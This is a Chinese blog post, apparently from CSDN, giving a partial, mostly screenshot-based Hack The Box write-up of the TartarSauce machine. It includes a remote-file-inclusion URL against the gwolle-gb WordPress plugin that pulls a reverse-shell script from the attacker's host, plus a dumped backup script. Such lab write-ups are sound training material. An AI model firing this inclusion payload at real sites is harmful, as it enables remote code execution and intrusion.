Hack the box靶机 TartarSauce

最新推荐文章于 2023-02-02 17:59:40 发布
最新推荐文章于 2023-02-02 17:59:40 发布
阅读量518 收藏
点赞数 2
分类专栏: Hack the box
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38005854/article/details/106264754
版权

在这里插入图片描述
5个页面
访问一下

在这里插入图片描述

在这里插入图片描述在这里插入图片描述

找到点东西
一个损坏的blog

在这里插入图片描述在这里插入图片描述

呵呵
又是一个兔子洞
nice
一天钻了两个洞
接着上面的那个损坏的页面来

在这里插入图片描述在这里插入图片描述在这里插入图片描述

扫描报错
没有api
https://wpvulndb.com/api

在这里插入图片描述在这里插入图片描述
在这里插入图片描述

http://10.10.10.88/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.16.118:8000/
需要打开http服务
还要创建一个wp-load.php的反射脚本

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

变成onuma账号

在这里插入图片描述

onuma@TartarSauce:~$ cat /usr/sbin/backuperer
cat /usr/sbin/backuperer
#!/bin/bash

#-------------------------------------------------------------------------------------
# backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ
# ONUMA Dev auto backup program
# This tool will keep our webapp backed up incase another skiddie defaces us again.
# We will be able to quickly restore from a backup in seconds ;P
#-------------------------------------------------------------------------------------

# Set Vars Here
basedir=/var/www/html
bkpdir=/var/backups
tmpdir=/var/tmp
testmsg=$bkpdir/onuma_backup_test.txt
errormsg=$bkpdir/onuma_backup_error.txt
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
check=$tmpdir/check

# formatting
printbdr()
{
    for n in $(seq 72);
    do /usr/bin/printf $"-";
    done
}
bdr=$(printbdr)

# Added a test file to let us see when the last backup was run
/usr/bin/printf $"$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg

# Cleanup from last time.
/bin/rm -rf $tmpdir/.* $check

# Backup onuma website dev files.
/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &

# Added delay to wait for backup to complete if large files get added.
/bin/sleep 30

# Test the backup integrity
integrity_chk()
{
    /usr/bin/diff -r $basedir $check$basedir
}

/bin/mkdir $check
/bin/tar -zxvf $tmpfile -C $check
if [[ $(integrity_chk) ]]
then
    # Report errors so the dev can investigate the issue.
    /usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran :  $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
    integrity_chk >> $errormsg
    exit 2
else
    # Clean up and save archive to the bkpdir.
    /bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
    /bin/rm -rf $check .*
    exit 0
fi
onuma@TartarSauce:~$

一个网站备份的脚本
脚本的作用是进行备份
并且休眠30秒
30秒后进行和上一次备份对比
打印出不同的地方

在这里插入图片描述在这里插入图片描述在这里插入图片描述
在这里插入图片描述在这里插入图片描述

这道题不想写了 walkthrough
到提权时候完全不会了
不知道在干嘛
看walkthrough也看不懂
一脸懵逼
好希望有个人能给我讲一讲
钻了一天的兔子洞
脑子昏昏沉沉的
这个题还2.8
我给他满分
成功的让我知道了自己的无知无能

菜浪马废
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hackthebox - TartarSauce (考点:信息搜集/wp漏洞)(未完成)
冬萍子癸水
04-15 424
nmap 就一个80,里面一张酸酸乳样的照片 然后打开robots.txt,看到webservices似乎有很多料,点看看看未发现太多 同时,扫目录也发现了webservices 继续深挖,扫webservices里面还有啥。 看到wp。wordpress的简称 看到wp就要想到用wpscan扫他 wpscan --url http://10.10.10.88/webservices/wp ...
HTB靶场系列 linux靶机 Tartarsause靶机
m0_57221101的博客
01-21 1734
勘探 nmap直接扫 root@kali:~/hackthebox/tartarsauce-10.10.10.88# nmap 10.10.10.88 Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-22 12:21 EDT Warning: 10.10.10.88 giving up on port because retransmission cap hit (10). Nmap scan report for 10.10.10.88 Host
HackTheBox::TartarSauce
aya3t的博客
10-12 106
HackTheBox::TartarSauce
No.131-HackTheBox-Linux-TartarSauce-Walkthrough渗透学习
qq_34801745的博客
06-10 722
** HackTheBox-Linux-TartarSauce-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/138 靶机难度:中级(4.7/10) 靶机发布日期:2018年10月28日 靶机描述: TartarSauce is a fairly challenging box that highlights the importance of a broad remote enumeration instead of
HackTheBox靶机系列之困难Reel
04-09
HackTheBox靶机系列之困难Reel 本篇文章主要介绍了Reel靶机的整个利用过程,从侦察到提权,涵盖了渗透测试、漏洞利用、信息收集等多个方面的知识点。 侦察阶段 在Reel靶机中,我们首先进行了侦察,扫描了21、22、...
Hack the box的Easy难度比较有价值的靶机.rar
11-04
"Hack the Box"(HTB)是一个在线平台,提供各种虚拟靶机,让安全专家和爱好者通过模拟真实世界的攻击场景来提升自己的技能。这个“Easy”难度级别的靶机是为初学者设计的,旨在帮助他们入门渗透测试的基础知识。 ...
hack me please靶机攻略.docx
10-19
"hack me please靶机攻略" 本资源为一份详细的靶机攻略文档,涵盖了从主机发现到获取 root 权限的整个过程。下面是从文档中提取的关键知识点: 一、主机发现 * 使用 nmap 工具进行主机发现和端口扫描,命令为:...
平台的核心功能包括: 虚拟靶场: Hack The Box 提供了一系列的虚拟机(靶机),这些虚拟机模拟了真实世界中可能遇到
最新发布
06-22
Hack The Box 提供了一系列的虚拟机(靶机),这些虚拟机模拟了真实世界中可能遇到的各种系统配置和安全漏洞。 参与者需要利用自己的知识和工具来破解这些虚拟机,找到所谓的“flag”(通常是文本文件),并提交到...
平台的核心功能包括:虚拟靶场:Hack The Box 提供了一系列的虚拟机(靶机),这些虚拟机模拟了真实世界中可能遇到
06-22
Hack The Box 提供了一系列的虚拟机(靶机),这些虚拟机模拟了真实世界中可能遇到的各种系统配置和安全漏洞。 参与者需要利用自己的知识和工具来破解这些虚拟机,找到所谓的“flag”(通常是文本文件),并提交到...
Hack the box靶机 shocker
菜浪马废的博客
05-19 340
https://en.wikipedia.org/wiki/Shellshock_(software_bug) 漏洞原理
Hack The Box】linux练习-- Shocker
人间体佐菲的博客
11-08 316
Hack The Box】linux练习-- Shocker
hack the box靶场练习之shocker
qq_44767905的博客
02-02 220
hackthebox之shocker
hackthebox-shock(考点:shellshock & perl提权)
冬萍子癸水
04-10 498
nmap 看80,就一张图片,没啥东西,ctrl+u也没发现价值东西 dirbuster扫,扫很久就/cgi-bin。没有突破点啊。 /cgi-bin和shellshock漏洞有关联,看看是不是他 只要cgi里面有脚本文件即可被利用,比如sh等 那就再拿dirbuster扫cgi-bin目录,加上扫sh/pl/py/cgi 这些后缀 果然有个sh文件 这个漏洞挺有名,有很多工具,我选择这个 p...
Linux/Shocker
ve9etable的博客
09-02 351
ss
HackTheBox-optimum&shocker渗透测试
weixin_43111940的博客
04-16 262
optimum 端口 sudo nmap -sC -sV -A -p 80 10.10.10.8 可以看到是fileserver和对应的版本2.3 找到对应的CVE-2014-6287 看一下这个漏洞的详细信息,就是一个类似00截断去执行命令的RCE http://localhost:80/?search=%00{.exec|cmd.} bp抓包修改参数 kali监听网卡 sudo tcpdump -i tun0 抓到了icmp包,可以命令执行 在靶机上执行powershell命令来下载攻击机上
No.117-HackTheBox-Linux-Shocker-Walkthrough渗透学习
qq_34801745的博客
05-27 440
** HackTheBox-Linux-Shocker-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/108 靶机难度:中级(4.7/10) 靶机发布日期:2017年10月3日 靶机描述: Shocker, while fairly simple overall, demonstrates the severity of the renowned Shellshock exploit, which affected m
HTB-oscplike-Irked+Tartarsauce
m0_53302733的博客
04-01 1627
HTB-oscplike-Irked+Tartarsauce Irked easy难度的lrked 靶机IP 10.10.10.117 sudo nmap -sC -sV -A -p- --min-rate=5000 -Pn 10.10.10.117 22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0) 80/tcp open http Apache httpd 2.4.10 ((Debian)) 111/tc
hack the box three
07-28
回答: 根据提供的引用内容,我了解到"Hack The Box"是一个在线平台,提供了一系列的虚拟机供用户进行渗透测试和漏洞利用的训练。根据引用\[1\]中的信息,可能涉及到nmap扫描、访问靶机地址、查看/etc/hosts、使用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值